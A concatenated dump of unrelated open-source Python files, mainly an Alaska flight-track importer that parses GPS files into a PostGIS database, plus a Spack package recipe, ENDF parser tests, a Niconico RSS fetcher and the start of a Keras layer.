string,\r\n # then try to remove the degree symbol,\r\n # then convert back to float because the decimal will cause .astype(int) to throw an error,\r\n # then to int\r\n df['heading'] = df['Heading']\\\r\n .astype(str)\\\r\n .str.replace('°', '')\\\r\n .astype(float)\\\r\n .astype(int)\r\n\r\n df['altitude_ft'] = df['Altitude'].str.split(' ').str[0].astype(float).round().astype(int) # Replace \"ft\" and convert to int\r\n\r\n # GSAT datetimes are in local time, so calculate UTC so that\r\n df['ak_datetime'] = pd.to_datetime(df['Date'], errors='coerce')\r\n timezone = pytz.timezone('US/Alaska')\r\n df['utc_datetime'] = df.ak_datetime - df.ak_datetime.apply(timezone.utcoffset)\r\n\r\n return df\r\n\r\n\r\ndef format_spy(path, encoding='ISO-8859-1', **kwargs):\r\n\r\n df = pd.read_csv(path, encoding=encoding)\r\n\r\n if 'Speed(mph)' in df:\r\n df['knots'] = df['Speed(mph)'] / 1.151\r\n elif 'Speed(knots)' in df:\r\n df['knots'] = df['Speed(knots)']\r\n else:\r\n raise KeyError('\"Speed\" column for file %s not found. Expected either \"Speed(mph)\" or \"Speed(knots)\" but columns in this file are:\\n\\t-%s' % (path, '\\n\\t-'.join(df.columns.sort_values)))\r\n\r\n df.rename(columns=CSV_OUTPUT_COLUMNS['spy'], inplace=True)\r\n expected_lat_fields = [k for k, v in CSV_OUTPUT_COLUMNS.items() if v == 'latitude']\r\n expected_lon_fields = [k for k, v in CSV_OUTPUT_COLUMNS.items() if v == 'longitude']\r\n try:\r\n df[['latitude', 'longitude']] = df[['latitude', 'longitude']].astype(float)\r\n except KeyError as e:\r\n raise KeyError('No latitude and/or longitude fields found. Expected one of {lat_fields} for latitude fields and'\r\n ' {lon_fields for longitude fields. Input fields were:\\n\\t-{columns}'\r\n .format(lat_fields=expected_lat_fields, lon_fields=expected_lon_fields, columns='\\n\\t-'.join(df.columns))\r\n )\r\n\r\n df.altitude_ft = df.altitude_ft.astype(int)\r\n df.utc_datetime = pd.to_datetime(df.utc_datetime, errors='coerce')\r\n df.ak_datetime = pd.to_datetime(df.ak_datetime, errors='coerce')\r\n\r\n return df\r\n\r\n\r\ndef format_tms(path, encoding='ISO-8859-1', **kwargs):\r\n\r\n df = pd.read_csv(path, encoding=encoding)\r\n\r\n # some of the time TMS columns names have spaces on either end\r\n df.columns = df.columns.str.strip()\r\n\r\n df.rename(columns=CSV_OUTPUT_COLUMNS['tms'], inplace=True)\r\n\r\n # Lat and lon are (annoyingly) in the format DDMM.MMMM without any separator between degrees and minutes, so attempt\r\n # to parse them\r\n try:\r\n coefficient = df['HemNS'].apply(lambda x: 1 if x == 'N' else -1)\r\n df['latitude'] = (df['latitude'].astype(str).str[:2].astype(float) + df['latitude'].astype(str).str[2:].astype(float)/60) * coefficient\r\n except Exception as e:\r\n raise AttributeError('Could not parse latitude field for %s because of %s' % (path, e))\r\n try:\r\n coefficient = df['HemEW'].apply(lambda x: -1 if x == 'W' else 1)\r\n df['longitude'] = (df['longitude'].astype(str).str[:3].astype(float) + df['longitude'].astype(str).str[3:].astype(float)/60) * coefficient\r\n except Exception as e:\r\n raise AttributeError('Could not parse longitude field for %s because of %s' % (path, e))\r\n\r\n df['altitude_ft'] = (df['Altitude (m)'] * FEET_PER_METER).astype(int)\r\n df['utc_datetime'] = pd.to_datetime(df['utc_datetime'], errors='coerce')\r\n\r\n return df\r\n\r\n\r\ndef format_foreflight_csv(path, encoding='ISO-8859-1', **kwargs):\r\n\r\n try:\r\n registration = pd.read_csv(path, encoding=encoding, nrows=5).loc[0, 'Tail Number']\r\n except:\r\n registration = ''\r\n df = pd.read_csv(path, encoding=encoding, skiprows=2)\r\n df['registration'] = registration\r\n\r\n # Timestamp are in local time. The rest of the read functions all return UTC time, so calcualte that, even though\r\n # the local time will just be calculated later\r\n epoch_datetime = datetime(1970, 1, 1)\r\n df['utc_datetime'] = pd.to_datetime([epoch_datetime + timedelta(seconds=round(ts/1000)) for ts in df['Timestamp']])\r\n\r\n # Convert altitude meters to feet\r\n df['altitude_ft'] = (df['Altitude'] * FEET_PER_METER).astype(int)\r\n\r\n # Rename other columns that don't need to be recalculated\r\n df.rename(columns={'Longitude': 'longitude',\r\n 'Latitude': 'latitude',\r\n 'Course': 'heading',\r\n 'Speed': 'knots'},\r\n inplace=True)\r\n\r\n return df\r\n\r\n\r\ndef read_excel(path):\r\n \"\"\"\r\n Wrapper for read_csv() (after converting Excel file to CSV)\r\n :param path: Excel track\r\n :return: GeoDataFrame of the track file\r\n \"\"\"\r\n df = pd.read_excel(path)\r\n _, ext = os.path.splitext(path)\r\n csv_path = path.replace(ext, '.csv')\r\n df.to_csv(csv_path, index=False)\r\n\r\n return read_csv(csv_path)\r\n\r\n\r\ndef get_csv_type(path, encoding):\r\n \"\"\"\r\n Helper function to try to determine the CSV source\r\n :param path:\r\n :param encoding:\r\n :return:\r\n \"\"\"\r\n column_match_scores = pd.Series([0])\r\n skip_rows = 0\r\n best_match = None\r\n while skip_rows < 10:\r\n df = pd.read_csv(path, encoding=encoding, nrows=2, skiprows=skip_rows)\r\n df.columns = df.columns.str.strip()\r\n # Figure out which file type it is (aff, gsat, spy, or tms) by selecting the file type that most closely matches\r\n # the expected columns per type\r\n named_columns = df.columns[~df.columns.str.startswith('Unnamed')].str.strip()\r\n\r\n if len(named_columns):\r\n # This row doesn't have any recognized column names so skip it\r\n\r\n column_match_scores = pd.Series({\r\n file_type: len(named_columns[named_columns.isin(pd.Series(columns).str.strip())]) / float(len(named_columns))\r\n for file_type, columns in CSV_INPUT_COLUMNS\r\n })\r\n\r\n if column_match_scores.any():\r\n best_match = column_match_scores.idxmax() #index is file_type\r\n break\r\n\r\n skip_rows += 1\r\n\r\n return best_match, skip_rows\r\n\r\n\r\ndef read_csv(path, seg_time_diff=None):\r\n \"\"\"\r\n Read and format a CSV of track data. CSVs can come from 4 different sources, so figure out which source it comes\r\n from and format accordingly\r\n\r\n :param path: path to track CSV\r\n :return: GeoDataframe of points\r\n \"\"\"\r\n # Try to determine the file's encoding\r\n detector = chardet.universaldetector.UniversalDetector()\r\n encoding = ''\r\n with open(path, 'rb') as f:\r\n for line in f.readlines():\r\n detector.feed(line)\r\n if detector.done:\r\n encoding = detector.result['encoding']\r\n break\r\n \r\n detector.close()\r\n # Get the encoding even if the detector doesn't have high confidence\r\n encoding = detector.result['encoding']\r\n #raise RuntimeError('Could not determine encoding of file ' + path)\r\n \r\n\r\n CSV_FUNCTIONS = {'aff': format_aff,\r\n 'gsat': format_gsat,\r\n 'spy': format_spy,\r\n 'tms': format_tms,\r\n 'foreflight': format_foreflight_csv\r\n }\r\n\r\n best_match, skip_rows = get_csv_type(path, encoding)\r\n \r\n if not best_match in CSV_FUNCTIONS:\r\n sorted_types = sorted(CSV_FUNCTIONS.keys())\r\n raise IOError(\r\n 'The data source could not be interpreted from the column names. ' +\r\n ('Only %s, and %s currently accepted.' % (', '.join(sorted_types[:-1]), sorted_types[-1]))\r\n )\r\n\r\n df = CSV_FUNCTIONS[best_match](path, encoding, skip_rows=skip_rows)\r\n df.heading = df.heading.round().astype(int)\r\n df.knots = df.knots.round().astype(int)\r\n\r\n # Make the dataframe into a geodataframe of points\r\n geometry = df.apply(lambda row: shapely_Point(row.longitude, row.latitude, row.altitude_ft), axis=1)\r\n gdf = gpd.GeoDataFrame(df, geometry=geometry)\r\n gdf['diff_m'] = calc_distance_to_last_pt(gdf)\r\n\r\n return gdf\r\n\r\n\r\ndef get_flight_id(gdf, seg_time_diff):\r\n '''\r\n Assign a unique ID to each line segment. IDs use the registation (i.e. N-number) and timestamp like\r\n _yyyymmddhhMM. All columns are assigned in place.\r\n '''\r\n # Calculate the difference in time between rows\r\n time_diff = gdf.ak_datetime.diff() / np.timedelta64(1, 'm')#.groupby(gdf['date_str']).diff() # don't groupby day in case there's an overnight flight\r\n # Assign a sequential integer to each different flight segment for the file. Only the start of a new flight will\r\n # have a difference in time with it's previous row of more than seg_time_diff (in theory), so these rows will\r\n # evaluate to True. Also start a new segment where the is_new_segment column is True (this column is potentially \r\n # altered in the web app when a track is split, but if it doesn't exist in the data, create it). cumsum() treats \r\n # these as a 1 and False values as 0, so all rows of the same segment will have the same ID.\r\n if 'is_new_segment' not in gdf:\r\n gdf['is_new_segment'] = False\r\n gdf['segment_id'] = ((time_diff >= seg_time_diff) | gdf.is_new_segment).cumsum()\r\n \r\n departure_times = gdf.groupby('segment_id').ak_datetime.min().to_frame().rename(columns={'ak_datetime': 'departure_datetime'})\r\n gdf = gdf.merge(departure_times, on='segment_id')\r\n gdf['timestamp_str'] = gdf.departure_datetime.dt.floor('%smin' % seg_time_diff).dt.strftime('%Y%m%d%H%M')\r\n gdf['flight_id'] = gdf.registration + '_' + gdf.timestamp_str#gdf.date_str + '_' + segment_id.astype(str)\r\n\r\n return gdf\r\n\r\n\r\nREAD_FUNCTIONS = {'.gpx': read_gpx,\r\n '.gdb': read_gdb,\r\n '.csv': read_csv,\r\n '.kml': read_kml,\r\n '.xlsx': read_excel\r\n }\r\n\r\n\r\ndef check_duplicate_flights(registration, connection, start_time, end_time):\r\n \"\"\"\r\n Check whether an aircraft with this registration has been recorded in the DB for any time within a given start and\r\n end time\r\n\r\n :param registration: Tail (N-) number for this flight\r\n :param connection: SQLAlchemy DB connection (from engine.connect()) pointing to postgres backend overflights DB\r\n :param start_time: starting time for this flight\r\n :param end_time: ending time for this flight\r\n :return: pd.DataFrame of matching flight points\r\n \"\"\"\r\n sql = \"\"\"\r\n SELECT flights.* \r\n FROM flight_points \r\n INNER JOIN flights ON flight_points.flight_id = flights.id\r\n WHERE\r\n flight_points.ak_datetime BETWEEN '{start_time}' AND '{end_time}' AND\r\n flights.registration = '{registration}'\r\n \"\"\"\\\r\n .format(start_time=start_time.strftime('%Y-%m-%d %H:%M'),\r\n end_time=end_time.strftime('%Y-%m-%d %H:%M'),\r\n registration=registration)\r\n\r\n #with engine.connect() as conn, conn.begin():\r\n matching_flights = pd.read_sql(sql, connection).drop_duplicates(subset=['registration', 'departure_datetime'])\r\n\r\n return matching_flights\r\n\r\n\r\ndef calculate_duration(gdf):\r\n \"\"\"\r\n Helper function to calculate landing time and duration. This needs to happen \r\n in format track, but it also needs to be recalculated after edits\r\n \"\"\" \r\n land_times = gdf.groupby('segment_id').ak_datetime.max().to_frame().rename(columns={'ak_datetime': 'land_time'})\r\n gdf['landing_datetime'] = gdf.merge(land_times, on='segment_id').land_time\r\n gdf['duration_hrs'] = (gdf.landing_datetime - gdf.departure_datetime).dt.seconds/3600.0\r\n\r\n return gdf\r\n\r\n\r\ndef format_track(path, seg_time_diff=15, min_point_distance=200, registration='', submission_method='manual', operator_code=None, aircraft_type=None, force_registration=True, **kwargs):\r\n\r\n _, extension = os.path.splitext(path)\r\n\r\n # try to apply function from dict based on file extension\r\n try:\r\n gdf = READ_FUNCTIONS[extension.lower()](path)\r\n except:\r\n # If that failed, try each track reading function\r\n for ext in READ_FUNCTIONS.keys():\r\n if ext == extension.lower():\r\n continue # already tried this one so no sense in wasting the effort\r\n else:\r\n try:\r\n gdf = READ_FUNCTIONS[ext](path)\r\n # It might be possible for the read function to return a Geodataframe that just doesn't have the\r\n # right cols. If it doesn't, raise a generic exception to try the next function\r\n if not VALIDATION_COLUMNS.isin(gdf.columns).all():\r\n raise\r\n break # if we got here, that means the file was successfully read\r\n except:\r\n continue\r\n\r\n if not 'gdf' in locals():\r\n error_message = 'Unable to read the file %s' % path\r\n if not extension.lower() in READ_FUNCTIONS:\r\n sorted_extensions = [c.replace('.', '').upper() for c in sorted(READ_FUNCTIONS.keys())]\r\n error_message += ' because it is likely of an unsupported file type: %s. Only %s, and %s currently accepted.' % \\\r\n (extension.replace('.', '').upper(), ', '.join(sorted_extensions[:-1]), sorted_extensions[-1])\r\n raise IOError(error_message)\r\n\r\n # Calculate local (AK) time\r\n timezone = pytz.timezone('US/Alaska')\r\n if 'ak_datetime' not in gdf.columns:\r\n # If the timezone is defined (because it was included in the timestamp given by the file), convert to local time\r\n # to get AK time\r\n if gdf.utc_datetime.dt.tz:\r\n gdf['ak_datetime'] = gdf.utc_datetime.dt.tz_convert(timezone)\r\n else: # otherwise, calculate by adding the offset\r\n gdf['ak_datetime'] = gdf.utc_datetime + gdf.utc_datetime.apply(timezone.utcoffset)\r\n # track points are *usually* in chronological order, but not always Also some files have duplicated track points for\r\n # some reason, so get rid of those. Resetting the index is important if this function is being called from \r\n # poll_feature_service.py. The index is used to create a point_index field, which the track-editor app needs\r\n # for splitting tracks and deleting points\r\n gdf = gdf.sort_values('ak_datetime')\\\r\n .drop_duplicates('ak_datetime')\\\r\n .reset_index() \r\n\r\n # Validate the registration\r\n if 'registration' in gdf.columns and not force_registration: # Already in a column in the data\r\n if registration:\r\n warnings.warn('registration %s was given but the registration column found in the data will be '\r\n 'used instead' % registration)\r\n # verify that the reg. in each column matches the right pattern\r\n regex_mask = gdf.registration.str.contains(REGISTRATION_REGEX, case=False)\r\n if not all(regex_mask):\r\n invalid_registrations = gdf.loc[~regex_mask, 'registration'].unique()\r\n raise ValueError('A column with aircraft registrations was detected in the input file, but the following '\r\n 'registrations were invalid:\\n\\t-%s' % '\\n\\t-'.join(invalid_registrations))\r\n else:\r\n # If given, make sure it matches the pattern (N1 to N99999, N1A to N9999Z, or N1AA to N999ZZ)\r\n if registration:\r\n if not re.fullmatch(REGISTRATION_REGEX, registration):\r\n raise ValueError('The registration given, %s, is invalid' % registration)\r\n # If the N-number wasn't given, try to find it in the file\r\n else:\r\n reg_matches = re.findall(REGISTRATION_REGEX, os.path.basename(path))\r\n if len(reg_matches):\r\n registration = reg_matches[0].upper()\r\n else:\r\n # Generate a bogus registration (starts with Z instead of N)\r\n registration = 'Z' + \\\r\n ''.join(random.choices(string.digits, k=random.choice(range(1, 6)))) +\\\r\n ''.join(random.choices(string.ascii_uppercase, k=random.choice(range(1, 3))))\r\n warnings.warn('No registration column in the data, none could be found in the filename, and none given.'\r\n ' Using %s instead (random alphanumerics and starting with \"Z\")')\r\n # Otherwise, use the one given\r\n gdf['registration'] = registration\r\n\r\n gdf.registration = gdf.registration.str.upper()\r\n\r\n # Get unique flight_ids per line segment in place\r\n gdf = get_flight_id(gdf, seg_time_diff)\\\r\n .drop(gdf.index[((gdf.diff_m < min_point_distance) & (gdf.utc_datetime.diff().dt.seconds == 0))])\\\r\n .dropna(subset=['ak_datetime'])\\\r\n .sort_values(by=['ak_datetime'])\r\n\r\n gdf = calculate_duration(gdf)\r\n\r\n # Get metadata-y columns\r\n gdf['submission_time'] = (datetime.now()).strftime('%Y-%m-%d %H:%M')\r\n gdf['submission_method'] = submission_method\r\n gdf['is_new_segment'] = False\r\n if operator_code:\r\n gdf['operator_code'] = operator_code\r\n if aircraft_type:\r\n gdf['aircraft_type'] = aircraft_type\r\n if 'tracks_notes' in gdf:\r\n gdf['submitter_notes'] = gdf.tracks_notes\r\n\r\n return gdf\r\n\r\n\r\ndef import_data(connection_txt=None, data=None, path=None, seg_time_diff=15, min_point_distance=200, registration='', submission_method='manual', operator_code=None, aircraft_type=None, silent=False, force_import=False, ssl_cert_path=None, engine=None, force_registration=False, ignore_duplicate_flights=False, **kwargs):\r\n\r\n\r\n if type(data) == gpd.geodataframe.GeoDataFrame:\r\n gdf = data.copy()\r\n elif path:\r\n gdf = format_track(path, seg_time_diff=seg_time_diff, min_point_distance=min_point_distance,\r\n registration=registration, submission_method=submission_method,\r\n operator_code=operator_code, aircraft_type=aircraft_type, force_registration=force_registration)\r\n else:\r\n raise ValueError('Either data (a geodataframe) or path (to a valid track file) must be given')\r\n\r\n if not engine and connection_txt:\r\n engine = db_utils.connect_db(connection_txt)\r\n elif not engine:\r\n raise ValueError('Either an SQLAlchemy Engine (from create_engine()) or connection_txt must be given')\r\n\r\n # Recalculate landing time and duration here in case there were edits that changed these\r\n # Also drop any segments with only one vertex \r\n gdf = calculate_duration(gdf)\\\r\n .loc[gdf.duration_hrs > 0]\r\n\r\n # get columns from DB tables\r\n flight_columns = db_utils.get_db_columns('flights', engine)\r\n point_columns = db_utils.get_db_columns('flight_points', engine)\r\n line_columns = db_utils.get_db_columns('flight_lines', engine)\r\n ''' ############ add submission table #############'''\r\n\r\n # separate flights, points, and lines\r\n flights = gdf[[c for c in flight_columns if c in gdf]].drop_duplicates()\r\n \r\n flights['end_datetime'] = gdf.groupby('flight_id').ak_datetime.max().values\r\n # if coming from web app, this should already be in the data so don't overwrite\r\n #if 'submitter' not in flights.columns:\r\n # flights['submitter'] = os.getlogin()\r\n if 'track_editor' not in flights.columns:\r\n flights['track_editor'] = os.getlogin()#flights.submitter\r\n if path and 'source_file' not in flights.columns:\r\n flights['source_file'] = os.path.join(ARCHIVE_DIR, os.path.basename(path))\r\n if not len(flights):\r\n raise ValueError('No flight segments found in this file.')\r\n\r\n points = gdf.copy()\r\n points['geom'] = gdf.geometry.apply(lambda g: WKTElement(g.wkt, srid=4326))\r\n points.drop(columns=points.columns[~points.columns.isin(point_columns)], inplace=True)\r\n\r\n line_geom = gdf.groupby('flight_id').geometry.apply(lambda g: shapely_LineString(g.to_list()))\r\n lines = gpd.GeoDataFrame(flights.set_index('flight_id'), geometry=line_geom)\r\n lines['geom'] = lines.geometry.apply(lambda g: WKTElement(g.wkt, srid=4326))\r\n lines['flight_id'] = lines.index\r\n lines.drop(columns=lines.columns[~lines.columns.isin(line_columns)], inplace=True)\r\n lines.index.name = None\r\n\r\n with engine.connect() as conn, conn.begin():\r\n\r\n # Insert only new flights. Check for new flights by looking for flight points from the same registration number\r\n # that are within the start and end times of each flight segment (since an aircraft can't be in 2 locations\r\n # at the same time).\r\n existing_flight_info = []\r\n existing_flight_ids = []\r\n for _, f in flights.iterrows():\r\n matching_flights = check_duplicate_flights(f.registration, conn, f.departure_datetime, f.end_datetime)\r\n existing_flight_info.extend([(m.registration, m.departure_datetime) for _, m in matching_flights.iterrows()])\r\n existing_flight_ids.extend(matching_flights.flight_id)\r\n if len(existing_flight_info) and not force_import and not ignore_duplicate_flights:\r\n existing_str = '\\n\\t-'.join(['%s: %s' % f for f in existing_flight_info])\r\n raise ValueError('The file {path} contains flight segments that already exist in the database as'\r\n ' indicated by the following registration and departure times:\\n\\t-{existing_flights}'\r\n '\\nEither delete these flight segments from the database or run this script again with'\r\n ' the --force_import flag (ONLY USE THIS FLAG IF YOU KNOW WHAT YOU\\'RE DOING).'\r\n .format(path=path, existing_flights=existing_str))\r\n\r\n new_flights = flights.loc[~flights.flight_id.isin(existing_flight_ids)]\r\n new_flights.drop(columns='end_datetime')\\\r\n .to_sql('flights', conn, if_exists='append', index=False)\r\n\r\n # Warn the user if any of the flights already exist\r\n n_flights = len(flights)\r\n n_new_flights = len(new_flights)\r\n if n_new_flights == 0:\r\n raise ValueError('No new flight segments were inserted from this file because they all already exist in'\r\n ' the database.')\r\n if n_flights != n_new_flights:\r\n warnings.warn('For the file {path}, the following {existing} of {total} flight segments already exist:'\r\n '\\n\\t- {ids}'\r\n .format(path=path,\r\n existing=n_flights - n_new_flights,\r\n total=n_flights,\r\n ids='\\n\\t-'.join(existing_flight_ids)\r\n )\r\n )\r\n\r\n # Get the numeric IDs of the flights that were just inserted and insert the points and lines matching those\r\n # flight IDs that were just inserted\r\n flight_ids = pd.read_sql(\"SELECT id, flight_id FROM flights WHERE flight_id IN ('%s')\"\r\n % \"', '\".join(flights.flight_id),\r\n conn)\r\n points = points.merge(flight_ids, on='flight_id')\r\n points.loc[~points.flight_id.isin(existing_flight_ids)]\\\r\n .drop('flight_id', axis=1) \\\r\n .rename(columns={'id': 'flight_id'})\\\r\n .to_sql('flight_points',\r\n conn,\r\n if_exists='append',\r\n index=False,\r\n dtype={'geom': Geometry('POINT Z', srid=4326)})\r\n lines = lines.merge(flight_ids, on='flight_id')\r\n lines.loc[~lines.flight_id.isin(existing_flight_ids)]\\\r\n .drop('flight_id', axis=1) \\\r\n .rename(columns={'id': 'flight_id'})\\\r\n .to_sql('flight_lines',\r\n conn,\r\n if_exists='append',\r\n index=False,\r\n dtype={'geom': Geometry('LineStringZ', srid=4326)})\r\n\r\n # INSERT info about this aircraft if it doesn't already exist. If it does, UPDATE it if necessary\r\n # disable because this happens now as a separate scheduled task\r\n if ssl_cert_path:\r\n ainfo.update_aircraft_info(conn, registration, ssl_cert_path)#'''\r\n\r\n # VACUUM and ANALYZE clean up unused space and recalculate statistics to improve spatial query performance. Attempt\r\n # to run these commands on both spatial tables, but if they fail, just warn the user since it's not that big of\r\n # a deal\r\n try:\r\n with engine.execution_options(isolation_level='AUTOCOMMIT').connect() as conn:\r\n conn.execute('VACUUM ANALYZE flight_points;')\r\n conn.execute('VACUUM ANALYZE flight_lines;')\r\n except:\r\n warnings.warn(\"Unable to VACUUM and ANALYZE geometry tables. You should connect to the database and manually\"\r\n \" run 'VACUUM ANALYZE flight_points' and 'VACUUM ANALYZE flight_lines;' to ensure queries are as\"\r\n \" effecient as possible\")\r\n\r\n # Archive the data file\r\n if not os.path.isdir(ARCHIVE_DIR):\r\n try:\r\n os.mkdir(ARCHIVE_DIR)\r\n except:\r\n pass\r\n if os.path.isdir(os.path.dirname(path)):\r\n try:\r\n shutil.copy(path, ARCHIVE_DIR)\r\n os.remove(path)\r\n except Exception as e:\r\n warnings.warn('Data successfully imported, but could not copy track files because %s. You will have to '\r\n 'manually copy and paste this file to %s' % (e, ARCHIVE_DIR))\r\n\r\n if not silent:\r\n sys.stdout.write('%d flight %s imported:\\n\\t-%s' % (len(flights), 'tracks' if len(flights) > 1 else 'track', '\\n\\t-'.join(flight_ids.flight_id)))\r\n sys.stdout.flush()\r\n\r\n\r\ndef print_operator_codes(connection_txt):\r\n \"\"\"Helper function to display operator codes in the console for the user\"\"\"\r\n\r\n engine = db_utils.connect_db(connection_txt)\r\n operator_codes = db_utils.get_lookup_table(engine, 'operators', index_col='name', value_col='code')\r\n operator_code_str = '\\n\\t-'.join(sorted(['%s: %s' % operator for operator in operator_codes.items()]))\r\n\r\n print('Operator code options:\\n\\t-%s' % operator_code_str)\r\n\r\n\r\ndef main(connection_txt, track_path, seg_time_diff=15, min_point_distance=200, registration='', submission_method='manual', operator_code=None, aircraft_type=None, email_credentials_txt=None, log_file=None, force_import=False, ssl_cert_path=None):\r\n\r\n sys.stdout.write(\"Log file for %s: %s\\n\" % (__file__, datetime.now().strftime('%H:%M:%S %m/%d/%Y')))\r\n sys.stdout.write('Command: python %s\\n\\n' % subprocess.list2cmdline(sys.argv))\r\n sys.stdout.flush()\r\n\r\n seg_time_diff = int(seg_time_diff)\r\n min_point_distance = int(min_point_distance)\r\n\r\n if email_credentials_txt:\r\n sender, password = process_emails.get_email_credentials(email_credentials_txt)\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.starttls()\r\n server.ehlo()\r\n server.login(sender, password)\r\n\r\n try:\r\n import_data(connection_txt, path=track_path, seg_time_diff=seg_time_diff, min_point_distance=min_point_distance, registration=registration, submission_method=submission_method, operator_code=operator_code,\r\n aircraft_type=aircraft_type, force_import=force_import, ssl_cert_path=ssl_cert_path)\r\n except Exception as e:\r\n if email_credentials_txt:\r\n message_body = '''There was a problem with the attached file: %s'''\r\n subject = 'Error occurred while processing %s' % os.path.basename(track_path)\r\n process_emails.send_email(message_body, subject, sender, ERROR_EMAIL_ADDRESSES, server, attachments=[track_path, log_file])\r\n server.close()\r\n\r\n # Still raise the error so it's logged\r\n raise e\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n args = get_cl_args(__doc__)\r\n \r\n if args['show_operators']:\r\n sys.exit(print_operator_codes(args['connection_txt']))\r\n else:\r\n del args['show_operators']\r\n sys.exit(main(**args))\r\n\r\n","repo_name":"smHooper/flightsdb","sub_path":"scripts/import_track.py","file_name":"import_track.py","file_ext":"py","file_size_in_byte":52427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"1912742644","text":"from spack.package import *\n\n\nclass PyHepdataLib(PythonPackage):\n \"\"\"Library for getting your data into HEPData\"\"\"\n\n homepage = \"https://github.com/HEPData/hepdata_lib\"\n # PyPI archives are broken: missing requirement.txt file\n # pypi = \"hepdata_lib/hepdata_lib-0.9.0.tar.gz\"\n url = \"https://github.com/HEPData/hepdata_lib/archive/refs/tags/v0.9.0.tar.gz\"\n\n version(\"0.10.1\", sha256=\"71c635963883c51e7be18e03d80bfe42c5de350852b01010e3e45cbd1bff7a81\")\n version(\"0.9.0\", sha256=\"c9238e45c603d7c061ed670cf197ff03ad9d370ab50419b6916fda2cd86d6150\")\n\n depends_on(\"py-setuptools\", type=\"build\")\n depends_on(\"root+python\", type=(\"build\", \"run\"))\n depends_on(\"py-numpy\", type=(\"build\", \"run\"))\n depends_on(\"py-pyyaml@5:\", type=(\"build\", \"run\"))\n depends_on(\"py-future\", type=(\"build\", \"run\"))\n depends_on(\"py-six\", type=(\"build\", \"run\"))\n depends_on(\"py-pytest-runner\", type=\"build\")\n depends_on(\"py-pytest-cov\", type=\"build\")\n depends_on(\"py-hepdata-validator@0.3.2:\", when=\"@0.10.1:\", type=(\"build\", \"run\"))\n","repo_name":"spack/spack","sub_path":"var/spack/repos/builtin/packages/py-hepdata-lib/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"2114799155","text":"from pathlib import Path\nimport os\nimport pytest\nimport json\nfrom endf_parserpy.endf_parser import BasicEndfParser\nfrom endf_parserpy.debugging_utils import smart_is_equal, compare_objects\nfrom endf_parserpy.user_tools import sanitize_fieldname_types\n\n\n@pytest.fixture(scope=\"module\")\ndef myBasicEndfParser(ignore_zero_mismatch, ignore_number_mismatch,\n ignore_varspec_mismatch, fuzzy_matching, blank_as_zero,\n abuse_signpos, skip_intzero, prefer_noexp,\n accept_spaces):\n return BasicEndfParser(ignore_zero_mismatch=ignore_zero_mismatch,\n ignore_number_mismatch=ignore_number_mismatch,\n ignore_varspec_mismatch=ignore_varspec_mismatch,\n fuzzy_matching=fuzzy_matching,\n blank_as_zero=blank_as_zero,\n abuse_signpos=abuse_signpos,\n skip_intzero=skip_intzero,\n prefer_noexp=prefer_noexp,\n accept_spaces=accept_spaces)\n\n\ndef test_endf_parserpy_never_fails(endf_file, myBasicEndfParser, mf_sel):\n try:\n endfdic = myBasicEndfParser.parsefile(endf_file, include=mf_sel)\n except Exception as exc:\n filename = os.path.basename(endf_file)\n pytest.fail(f'BasicEndfParser failed on file {filename} with exception {exc}')\n\n\ndef test_endf_read_write_read_roundtrip_preserves_content(endf_file, tmp_path, myBasicEndfParser, mf_sel):\n endf_dic = myBasicEndfParser.parsefile(endf_file, include=mf_sel)\n outfile = tmp_path / os.path.basename(endf_file)\n myBasicEndfParser.writefile(outfile, endf_dic)\n endf_dic2 = myBasicEndfParser.parsefile(outfile, include=mf_sel)\n compare_objects(endf_dic, endf_dic2, atol=1e-10, rtol=1e-10)\n # also check if same number of lines of original input and output.\n # with include=tuple() sections are not parsed but taken verbatim as string.\n # original files sometimes contain additional whitespace at the end of line\n # or lack the NS line number field so we cut the strings for comparison after 75 characters\n raw_endf = myBasicEndfParser.parsefile(endf_file, include=tuple())\n raw_endf2 = myBasicEndfParser.parsefile(outfile, include=tuple())\n compare_objects(raw_endf, raw_endf2, strlen_only=True, rstrcut=75)\n\n\ndef test_endf_json_endf_roundtrip_preserves_content(endf_file, tmp_path, myBasicEndfParser, mf_sel):\n endf_dic = myBasicEndfParser.parsefile(endf_file, include=mf_sel)\n jsonstr = json.dumps(endf_dic, ensure_ascii=False)\n endf_dic2 = json.loads(jsonstr)\n sanitize_fieldname_types(endf_dic2)\n compare_objects(endf_dic, endf_dic2, atol=1e-10, rtol=1e-10)\n","repo_name":"IAEA-NDS/endf-parserpy","sub_path":"tests/test_endf_parser.py","file_name":"test_endf_parser.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"73"} +{"seq_id":"73431869035","text":"import logging\nimport requests\nfrom bs4 import BeautifulSoup\n\nlogger = logging.getLogger(__name__)\n\n\nclass NicovideoFetcher:\n\n @classmethod\n def fetch_playlist_and_latest_movie(cls, playlist_id: str) -> dict:\n d = {}\n try:\n # get playlist info\n url = f\"http://www.nicovideo.jp/mylist/{playlist_id}?rss=2.0&numbers=1&sort=1\"\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'xml')\n channel_item = soup.find('channel')\n d['playlist_title'] = channel_item.title.text\n d['playlist_url'] = channel_item.link.text\n\n # get latest movie info of playlist\n latest_item = soup.find('item')\n d['latest_movie_title'] = latest_item.title.text\n d['latest_movie_url'] = latest_item.link.text\n except Exception as e:\n logger.debug(e)\n logger.debug(f\"playlist_id:{playlist_id}\")\n finally:\n logger.debug(d)\n return d\n\n","repo_name":"uitspitss/ml2lm","sub_path":"plugins/utils/nicovideo_fetcher.py","file_name":"nicovideo_fetcher.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"18334926182","text":"import keras\nimport tensorflow as tf\nfrom keras.models import Model, load_model\nfrom keras.layers import *\nimport numpy as np\nfrom keras import backend as K\nimport os\nimport plotly.offline as py\nimport plotly.graph_objects as go\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '1'\n\nclass X_plus_Layer(Layer):\n def __init__(self, **kwargs):\n super(X_plus_Layer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.alpha = self.add_weight(name='alpha', initializer='ones', trainable=True)\n self.beta = self.add_weight(name='beta', initializer='zeros', trainable=True)\n super(X_plus_Layer, 